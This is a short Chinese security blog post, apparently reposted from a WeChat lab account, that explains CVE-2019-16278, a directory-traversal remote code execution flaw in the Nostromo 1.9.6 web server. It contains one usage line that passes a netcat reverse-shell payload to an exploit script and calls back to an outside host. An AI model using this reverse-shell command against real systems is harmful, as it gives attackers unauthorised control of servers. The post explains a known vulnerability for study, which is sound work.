本次仅为学习交流,请遵守《中华人民共和国网络安全法》,勿用于非授权测试,如作他用所承受的法律责任一概与作者无关。
前沿描述
最近研究了CVE-2019-16278 ,nostromo 服务器1.9.6 版本的远程代码执行,nostromo服务器是一个开源的web服务器,在unix系统中比较流行,通常用于OpenBSD系统。
Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。在我测试时,Nostromo的所有版本,包括最新的1.9.6版本,都存在漏洞。
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16278
漏洞使用
我利用了目标机器上的netcat反向连接vps获得目标机器的控制权限
命令如下:
./exp.sh x.x.x.x xx ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x xx >/tmp/f’
EXP请自行百度(或者谷歌)。
再次温馨提示:
请勿用于非授权测试
人在做天在看
手握日月摘星辰,安全路上永不止步。
- Khan攻防安全实验室
本文始发于微信公众号(Khan安全攻防实验室):基于CVE-2019-16278的漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论